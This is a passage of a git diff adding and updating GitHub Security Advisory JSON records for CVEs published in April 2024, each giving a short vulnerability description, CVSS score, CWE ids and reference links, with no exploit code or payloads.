3.12.11 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2039" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3058710/stackable-ultimate-gutenberg-blocks/tags/3.12.12/src/deprecated/v2/block/blog-posts/index.php?old=3037996&old_path=stackable-ultimate-gutenberg-blocks/tags/3.12.11/src/deprecated/v2/block/blog-posts/index.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/daa30b1b-cb8f-43fd-8329-c64b4024408f?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-p2cg-w533-rqh5/GHSA-p2cg-w533-rqh5.json b/advisories/unreviewed/2024/04/GHSA-p2cg-w533-rqh5/GHSA-p2cg-w533-rqh5.json new file mode 100644 index 00000000000..cb21e2b457e --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-p2cg-w533-rqh5/GHSA-p2cg-w533-rqh5.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p2cg-w533-rqh5", + "modified": "2024-04-10T15:30:40Z", + "published": "2024-04-10T15:30:40Z", + "aliases": [ + "CVE-2024-20779" + ], + "details": "Adobe Experience Manager versions 6.5.19 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20779" + }, + { + "type": "WEB", + "url": "https://helpx.adobe.com/security/products/experience-manager/apsb24-21.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T09:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-p2r5-c3vr-q4j5/GHSA-p2r5-c3vr-q4j5.json b/advisories/unreviewed/2024/04/GHSA-p2r5-c3vr-q4j5/GHSA-p2r5-c3vr-q4j5.json new file mode 100644 index 00000000000..9cae120f0f7 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-p2r5-c3vr-q4j5/GHSA-p2r5-c3vr-q4j5.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p2r5-c3vr-q4j5", + "modified": "2024-04-09T21:31:59Z", + "published": "2024-04-09T21:31:59Z", + "aliases": [ + "CVE-2024-2026" + ], + "details": "The Passster plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's content_protector shortcode in all versions up to, and including, 4.2.6.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2026" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/content-protector/trunk/inc/class-ps-public.php#L48" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/880f1f3f-857c-46da-a65c-082348260f89?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-p33p-qh45-v5wf/GHSA-p33p-qh45-v5wf.json b/advisories/unreviewed/2024/04/GHSA-p33p-qh45-v5wf/GHSA-p33p-qh45-v5wf.json new file mode 100644 index 00000000000..21a00e24468 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-p33p-qh45-v5wf/GHSA-p33p-qh45-v5wf.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p33p-qh45-v5wf", + "modified": "2024-04-08T03:30:52Z", + "published": "2024-04-08T03:30:52Z", + "aliases": [ + "CVE-2023-52351" + ], + "details": "In ril service, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service with System execution privileges needed", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52351" + }, + { + "type": "WEB", + "url": "https://www.unisoc.com/en_us/secy/announcementDetail/1777143682512781313" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T03:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-p35f-8932-32f3/GHSA-p35f-8932-32f3.json b/advisories/unreviewed/2024/04/GHSA-p35f-8932-32f3/GHSA-p35f-8932-32f3.json new file mode 100644 index 00000000000..776d835cbb7 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-p35f-8932-32f3/GHSA-p35f-8932-32f3.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p35f-8932-32f3", + "modified": "2024-04-10T15:30:38Z", + "published": "2024-04-10T15:30:38Z", + "aliases": [ + "CVE-2024-30710" + ], + "details": "An issue was discovered in ROS2 Dashing Diademata in ROS_VERSION 2 and ROS_PYTHON_VERSION 3, where the system transmits messages in plaintext. This flaw exposes sensitive information, making it vulnerable to man-in-the-middle (MitM) attacks, and allowing attackers to easily intercept and access this data.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30710" + }, + { + "type": "WEB", + "url": "https://github.com/yashpatelphd/CVE-2024-30710" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T01:15:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-p36x-xwm4-rxfm/GHSA-p36x-xwm4-rxfm.json b/advisories/unreviewed/2024/04/GHSA-p36x-xwm4-rxfm/GHSA-p36x-xwm4-rxfm.json new file mode 100644 index 00000000000..e57f47b39e4 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-p36x-xwm4-rxfm/GHSA-p36x-xwm4-rxfm.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p36x-xwm4-rxfm", + "modified": "2024-04-07T18:30:30Z", + "published": "2024-04-07T18:30:30Z", + "aliases": [ + "CVE-2024-31292" + ], + "details": "Unrestricted Upload of File with Dangerous Type vulnerability in Moove Agency Import XML and RSS Feeds.This issue affects Import XML and RSS Feeds: from n/a through 2.1.5.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31292" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/import-xml-feed/wordpress-import-xml-and-rss-feeds-plugin-2-1-5-arbitrary-file-upload-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-07T18:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-p5vg-cxw5-p93v/GHSA-p5vg-cxw5-p93v.json b/advisories/unreviewed/2024/04/GHSA-p5vg-cxw5-p93v/GHSA-p5vg-cxw5-p93v.json new file mode 100644 index 00000000000..379deb84cf9 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-p5vg-cxw5-p93v/GHSA-p5vg-cxw5-p93v.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p5vg-cxw5-p93v", + "modified": "2024-04-09T18:30:25Z", + "published": "2024-04-09T18:30:25Z", + "aliases": [ + "CVE-2024-26224" + ], + "details": "Windows DNS Server Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26224" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26224" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-416" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:42Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-p6rw-7v7m-xm65/GHSA-p6rw-7v7m-xm65.json b/advisories/unreviewed/2024/04/GHSA-p6rw-7v7m-xm65/GHSA-p6rw-7v7m-xm65.json new file mode 100644 index 00000000000..265012cf974 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-p6rw-7v7m-xm65/GHSA-p6rw-7v7m-xm65.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p6rw-7v7m-xm65", + "modified": "2024-04-09T18:30:27Z", + "published": "2024-04-09T18:30:27Z", + "aliases": [ + "CVE-2024-28914" + ], + "details": "Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28914" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-28914" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-122" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:51Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-p7hg-rgff-9395/GHSA-p7hg-rgff-9395.json b/advisories/unreviewed/2024/04/GHSA-p7hg-rgff-9395/GHSA-p7hg-rgff-9395.json new file mode 100644 index 00000000000..ca826fbc69b --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-p7hg-rgff-9395/GHSA-p7hg-rgff-9395.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p7hg-rgff-9395", + "modified": "2024-04-10T00:30:30Z", + "published": "2024-04-10T00:30:30Z", + "aliases": [ + "CVE-2024-3525" + ], + "details": "A vulnerability, which was classified as problematic, was found in Campcodes Online Event Management System 1.0. Affected is an unknown function of the file /views/index.php. The manipulation of the argument msg leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259896.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3525" + }, + { + "type": "WEB", + "url": "https://github.com/E1CHO/cve_hub/blob/main/Online%20Event%20Management%20System/Online%20Event%20Management%20System%20-%20vuln%204.pdf" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259896" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259896" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.312507" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T00:15:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-p7w3-3fmw-7j74/GHSA-p7w3-3fmw-7j74.json b/advisories/unreviewed/2024/04/GHSA-p7w3-3fmw-7j74/GHSA-p7w3-3fmw-7j74.json new file mode 100644 index 00000000000..c7becbcd54f --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-p7w3-3fmw-7j74/GHSA-p7w3-3fmw-7j74.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p7w3-3fmw-7j74", + "modified": "2024-04-08T03:30:51Z", + "published": "2024-04-08T03:30:51Z", + "aliases": [ + "CVE-2023-52341" + ], + "details": "In Plaintext COUNTER CHECK message accepted before AS security activation, there is a possible missing permission check. This could lead to remote information disclosure no additional execution privileges needed", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52341" + }, + { + "type": "WEB", + "url": "https://www.unisoc.com/en_us/secy/announcementDetail/1777143682512781313" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T03:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-p854-chwv-28c2/GHSA-p854-chwv-28c2.json b/advisories/unreviewed/2024/04/GHSA-p854-chwv-28c2/GHSA-p854-chwv-28c2.json new file mode 100644 index 00000000000..4b262689570 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-p854-chwv-28c2/GHSA-p854-chwv-28c2.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p854-chwv-28c2", + "modified": "2024-04-09T18:30:26Z", + "published": "2024-04-09T18:30:26Z", + "aliases": [ + "CVE-2024-26250" + ], + "details": "Secure Boot Security Feature Bypass Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26250" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26250" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-693" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:46Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-p8w6-cvmc-rg5g/GHSA-p8w6-cvmc-rg5g.json b/advisories/unreviewed/2024/04/GHSA-p8w6-cvmc-rg5g/GHSA-p8w6-cvmc-rg5g.json new file mode 100644 index 00000000000..863b3afe542 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-p8w6-cvmc-rg5g/GHSA-p8w6-cvmc-rg5g.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p8w6-cvmc-rg5g", + "modified": "2024-04-09T15:30:38Z", + "published": "2024-04-09T15:30:38Z", + "aliases": [ + "CVE-2024-23671" + ], + "details": "A improper limitation of a pathname to a restricted directory ('path traversal') in Fortinet FortiSandbox version 4.4.0 through 4.4.3 and 4.2.0 through 4.2.6 and 4.0.0 through 4.0.4 allows attacker to execute unauthorized code or commands via crafted HTTP requests.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23671" + }, + { + "type": "WEB", + "url": "https://fortiguard.com/psirt/FG-IR-23-454" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T15:15:31Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-p9c6-wr4p-mpm5/GHSA-p9c6-wr4p-mpm5.json b/advisories/unreviewed/2024/04/GHSA-p9c6-wr4p-mpm5/GHSA-p9c6-wr4p-mpm5.json new file mode 100644 index 00000000000..c7f0af7d307 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-p9c6-wr4p-mpm5/GHSA-p9c6-wr4p-mpm5.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p9c6-wr4p-mpm5", + "modified": "2024-04-10T00:30:29Z", + "published": "2024-04-10T00:30:29Z", + "aliases": [ + "CVE-2024-3556" + ], + "details": "Rejected reason: Duplicate of CVE-2024-3557", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3556" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T22:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-p9h2-24g6-pg7j/GHSA-p9h2-24g6-pg7j.json b/advisories/unreviewed/2024/04/GHSA-p9h2-24g6-pg7j/GHSA-p9h2-24g6-pg7j.json new file mode 100644 index 00000000000..630b1312f78 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-p9h2-24g6-pg7j/GHSA-p9h2-24g6-pg7j.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p9h2-24g6-pg7j", + "modified": "2024-04-09T18:30:27Z", + "published": "2024-04-09T18:30:27Z", + "aliases": [ + "CVE-2024-28926" + ], + "details": "Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28926" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-28926" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-122" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-pc56-3cp6-3733/GHSA-pc56-3cp6-3733.json b/advisories/unreviewed/2024/04/GHSA-pc56-3cp6-3733/GHSA-pc56-3cp6-3733.json new file mode 100644 index 00000000000..db66da5e8c4 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-pc56-3cp6-3733/GHSA-pc56-3cp6-3733.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pc56-3cp6-3733", + "modified": "2024-04-05T21:32:44Z", + "published": "2024-04-05T21:32:44Z", + "aliases": [ + "CVE-2024-29757" + ], + "details": "there is a possible permission bypass due to Debug certs being allowlisted. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29757" + }, + { + "type": "WEB", + "url": "https://source.android.com/security/bulletin/pixel/2024-04-01" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-05T20:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-pcjj-9wx4-9phh/GHSA-pcjj-9wx4-9phh.json b/advisories/unreviewed/2024/04/GHSA-pcjj-9wx4-9phh/GHSA-pcjj-9wx4-9phh.json new file mode 100644 index 00000000000..e86bbda255b --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-pcjj-9wx4-9phh/GHSA-pcjj-9wx4-9phh.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pcjj-9wx4-9phh", + "modified": "2024-04-09T21:32:00Z", + "published": "2024-04-09T21:32:00Z", + "aliases": [ + "CVE-2024-3267" + ], + "details": "The Bold Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's bt_bb_price_list shortcode in all versions up to, and including, 4.8.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3267" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3064413/bold-page-builder" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/eed667d2-e53e-47b9-8012-2b9b46022f3a?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:40Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-pf5m-h35j-7c4j/GHSA-pf5m-h35j-7c4j.json b/advisories/unreviewed/2024/04/GHSA-pf5m-h35j-7c4j/GHSA-pf5m-h35j-7c4j.json index d67b9648010..371c9a8e4b3 100644 --- a/advisories/unreviewed/2024/04/GHSA-pf5m-h35j-7c4j/GHSA-pf5m-h35j-7c4j.json +++ b/advisories/unreviewed/2024/04/GHSA-pf5m-h35j-7c4j/GHSA-pf5m-h35j-7c4j.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-pf5m-h35j-7c4j", - "modified": "2024-04-03T00:30:55Z", + "modified": "2024-04-06T18:31:16Z", "published": "2024-04-03T00:30:55Z", "aliases": [ "CVE-2024-3203" @@ -25,6 +25,10 @@ "type": "WEB", "url": "https://drive.google.com/drive/folders/1T1k3UeS09m65LjVXExUuZfedNQPWQWCo?usp=sharing" }, + { + "type": "WEB", + "url": "https://github.com/Blosc/c-blosc2/releases/tag/v2.14.3" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.259050" diff --git a/advisories/unreviewed/2024/04/GHSA-pg3r-pc9w-hjp2/GHSA-pg3r-pc9w-hjp2.json b/advisories/unreviewed/2024/04/GHSA-pg3r-pc9w-hjp2/GHSA-pg3r-pc9w-hjp2.json new file mode 100644 index 00000000000..fca0ce6dc88 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-pg3r-pc9w-hjp2/GHSA-pg3r-pc9w-hjp2.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pg3r-pc9w-hjp2", + "modified": "2024-04-09T18:30:28Z", + "published": "2024-04-09T18:30:28Z", + "aliases": [ + "CVE-2024-29993" + ], + "details": "Azure CycleCloud Elevation of Privilege Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29993" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-29993" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-pgc5-vrj2-c9w5/GHSA-pgc5-vrj2-c9w5.json b/advisories/unreviewed/2024/04/GHSA-pgc5-vrj2-c9w5/GHSA-pgc5-vrj2-c9w5.json index 9cdfb8613b1..2f6e2c90841 100644 --- a/advisories/unreviewed/2024/04/GHSA-pgc5-vrj2-c9w5/GHSA-pgc5-vrj2-c9w5.json +++ b/advisories/unreviewed/2024/04/GHSA-pgc5-vrj2-c9w5/GHSA-pgc5-vrj2-c9w5.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-pgc5-vrj2-c9w5", - "modified": "2024-04-03T15:30:41Z", + "modified": "2024-04-10T15:30:32Z", "published": "2024-04-01T09:30:31Z", "aliases": [ "CVE-2024-26654" @@ -30,6 +30,10 @@ "type": "WEB", "url": "https://git.kernel.org/stable/c/61d4787692c1fccdc268ffa7a891f9c149f50901" }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/8c990221681688da34295d6d76cc2f5b963e83f5" + }, { "type": "WEB", "url": "https://git.kernel.org/stable/c/9d66ae0e7bb78b54e1e0525456c6b54e1d132046" diff --git a/advisories/unreviewed/2024/04/GHSA-ph38-v5mc-q38p/GHSA-ph38-v5mc-q38p.json b/advisories/unreviewed/2024/04/GHSA-ph38-v5mc-q38p/GHSA-ph38-v5mc-q38p.json new file mode 100644 index 00000000000..ac3b17e3e8c --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-ph38-v5mc-q38p/GHSA-ph38-v5mc-q38p.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-ph38-v5mc-q38p", + "modified": "2024-04-09T15:30:37Z", + "published": "2024-04-09T15:30:37Z", + "aliases": [ + "CVE-2023-49913" + ], + "details": "A stack-based buffer overflow vulnerability exists in the web interface Radio Scheduling functionality of Tp-Link AC1350 Wireless MU-MIMO Gigabit Access Point (EAP225 V3) v5.1.0 Build 20220926. A specially crafted series of HTTP requests can lead to remote code execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.This vulnerability refers specifically to the overflow that occurs via the `action` parameter at offset `0x422448` of the `httpd` binary shipped with v5.0.4 Build 20220216 of the EAP115.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-49913" + }, + { + "type": "WEB", + "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1888" + }, + { + "type": "WEB", + "url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2023-1888" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T15:15:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-phm8-vx8c-46hm/GHSA-phm8-vx8c-46hm.json b/advisories/unreviewed/2024/04/GHSA-phm8-vx8c-46hm/GHSA-phm8-vx8c-46hm.json new file mode 100644 index 00000000000..42fb044769b --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-phm8-vx8c-46hm/GHSA-phm8-vx8c-46hm.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-phm8-vx8c-46hm", + "modified": "2024-04-07T18:30:30Z", + "published": "2024-04-07T18:30:30Z", + "aliases": [ + "CVE-2024-31346" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Blocksmarket Gradient Text Widget for Elementor allows Stored XSS.This issue affects Gradient Text Widget for Elementor: from n/a through 1.0.1.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31346" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/gradient-text-widget-for-elementor/wordpress-gradient-text-widget-for-elementor-plugin-1-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-07T18:15:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-phmv-qjxc-9jxj/GHSA-phmv-qjxc-9jxj.json b/advisories/unreviewed/2024/04/GHSA-phmv-qjxc-9jxj/GHSA-phmv-qjxc-9jxj.json new file mode 100644 index 00000000000..4d46b841289 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-phmv-qjxc-9jxj/GHSA-phmv-qjxc-9jxj.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-phmv-qjxc-9jxj", + "modified": "2024-04-09T18:30:25Z", + "published": "2024-04-09T18:30:25Z", + "aliases": [ + "CVE-2024-26234" + ], + "details": "Proxy Driver Spoofing Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": 